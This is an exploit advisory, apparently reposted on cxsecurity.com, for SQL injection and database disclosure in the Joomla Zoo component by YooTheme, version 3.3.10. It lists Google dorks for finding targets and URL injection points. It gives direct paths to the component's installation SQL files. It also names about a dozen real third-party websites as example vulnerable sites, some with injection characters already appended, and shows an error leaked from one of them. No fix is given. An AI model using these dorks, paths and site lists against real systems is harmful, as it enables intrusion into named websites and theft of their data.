Joomla Zoo by YooTheme Components 3.3.10 SQL Injection / Database Disclosure

2019-01-30 / 2019-01-29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################### # Exploit Title : Joomla Zoo by YooTheme Components 3.3.10 SQL Injection / Database Disclosure # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 30/01/2019 # Vendor Homepage : yootheme.com # Software Download Link : yootheme.com/zoo # Software Information Link : extensions.joomla.org/extension/zoo/ # Software Version : 3.3.33 and 3.3.10 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:"/index.php?option=com_zoo" inurl:''/administrator/components/com_zoo/'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] CWE-200 [ Information Exposure ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** ZOO component for Joomla 1.7 developed by YOOtheme . ZOO is a flexible and powerful content application builder to manage your content. #################################################################### # Impact : *********** * An attacker might be able inject and/or alter existing SQL statements which would influence the database exchange. * SQL injection vulnerability in the Joomla Zoo by YooTheme Components 3.3.10 and other versions because, it fails to sufficiently sanitize user-supplied data before using it in an SQL query. * Exploiting this issue could allow an attacker to compromise the application, read, access or modify data, or exploit latent vulnerabilities in the underlying database. If the webserver is misconfigured, read & write access to the filesystem may be possible. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_zoo&view=[SQL Injection] /index.php?option=com_zoo&view=frontpage&Itemid=[SQL Injection] /index.php?option=com_zoo&view=item&layout=item&Itemid=[SQL Injection] /index.php?option=com_zoo&view=category&Itemid=[SQL Injection] /index.php?option=com_zoo&task=category&category_id=[ID-NUMBER]&Itemid=[SQL Injection] /index.php?option=com_zoo&view=category&layout=category&Itemid=[SQL Injection] /index.php?Itemid=[ID-NUMBER]&option=com_zoo&view=item&category_id=[ID-NUMBER]&item_id=[SQL Injection] #################################################################### # Database Disclosure Exploit : *************************** /administrator/components/com_zoo/installation/index.sql /administrator/components/com_zoo/installation/install.sql /administrator/components/com_zoo/installation/uninstall.sql #################################################################### # Example Vulnerable Sites : ************************* [+] conycap.com/cloud/administrator/components/com_zoo/installation/index.sql [+] cabinete-stomatologice.biz/index.php?option=com_zoo&view=category&Itemid=3 [+] bestkitchenandappliances.com/index.php?Itemid=52&option=com_zoo&view=item&category_id=60&item_id=41 [+] socialmediasoluciones.com/index.php?option=com_zoo&task=category&category_id=25&Itemid=234 [+] bordervalley.co/index.php?option=com_zoo&view=item&layout=item&Itemid=262 [+] realstour.ru/index.php?option=com_zoo&view=category&Itemid=171 [+] animalwatcherspetresort.com/index.php?option=com_zoo&view=frontpage&Itemid=7%27 [+] mail.administratorsone.com/index.php?option=com_zoo&view=category&Itemid=226 [+] rt82.de/blog/index.php?option=com_zoo&view=item&layout=item&Itemid=110 [+] bestkitchenandappliances.com/index.php?option=com_zoo&view=category&layout=category&Itemid=58 [+] realstour.ru/index.php?option=com_zoo&task=item&item_id=91&Itemid=212 [+] virtual-managing.com/index.php?option=com_zoo&view=1%27 [+] locihouse.com/index.php?option=com_zoo&view=category&Itemid=4%27 #################################################################### # Example SQL Database Error : ***************************** Strict Standards: Non-static method JLoader::import() should not be called statically in /home/content/41/5733041/html/_sites /locihouse.com/libraries/joomla/import.php on line 29 #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top